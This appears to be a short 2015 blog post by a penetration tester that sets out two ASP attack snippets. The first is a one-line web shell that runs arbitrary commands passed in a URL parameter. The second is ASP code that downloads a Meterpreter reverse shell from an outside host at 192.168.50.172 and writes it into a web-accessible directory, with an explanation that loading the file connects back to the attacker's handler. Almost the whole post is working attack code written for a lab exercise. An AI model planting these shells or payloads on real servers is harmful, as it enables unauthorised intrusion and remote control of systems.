Tuesday, July 14, 2015

One Line ASP Shell

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
Request with http://target/shell.asp?cmd=ipconfig

Write to local file from ASP

I'm currently doing an exercise that requires me to have a server pull a reverse meterpreter asp shell from a remote location and store it to a specific file location on the server filesystem. This is the ASP code I ended up creating:

<%

Function GetTextFromUrl(url)

  Dim oXMLHTTP
  Dim strStatusTest

  Set oXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP.3.0")

  oXMLHTTP.Open "GET", url, False
  oXMLHTTP.Send

  If oXMLHTTP.Status = 200 Then

    GetTextFromUrl = oXMLHTTP.responseText

  End If

End Function

Dim sResult : sResult = GetTextFromUrl("http://192.168.50.172/meta.txt")
response.write sResult

dim fs,f
set fs=Server.CreateObject("Scripting.FileSystemObject")
set f=fs.CreateTextFile("C:/Program Files (x86)/WEBSERVERHERE/test.asp",true)
f.write(sResult)
f.close
set f=nothing
set fs=nothing
%>

"http://192.168.50.172/meta.txt" is the meterpreter ASP shell saved as a txt file.

"C:/Program Files (x86)/WEBSERVERHERE/test.asp" is what the meta.txt file will be saved as on the server's filesystem. Ideally you'd save that asp shell to a directory accessible via the web, because simply visiting the .asp file will execute it to reverse connect to your multi handler.